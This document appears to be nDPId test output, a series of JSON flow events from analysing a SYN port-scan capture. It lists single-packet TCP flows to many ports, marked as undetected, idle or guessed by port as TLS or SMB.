+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 